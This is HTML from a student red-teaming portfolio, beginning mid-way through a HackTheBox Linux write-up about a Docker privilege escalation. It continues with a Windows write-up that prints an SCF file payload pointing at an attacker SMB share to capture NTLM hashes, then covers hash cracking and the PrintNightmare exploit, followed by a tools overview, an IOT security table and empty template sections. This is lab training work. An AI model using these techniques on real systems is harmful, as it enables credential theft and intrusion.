          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
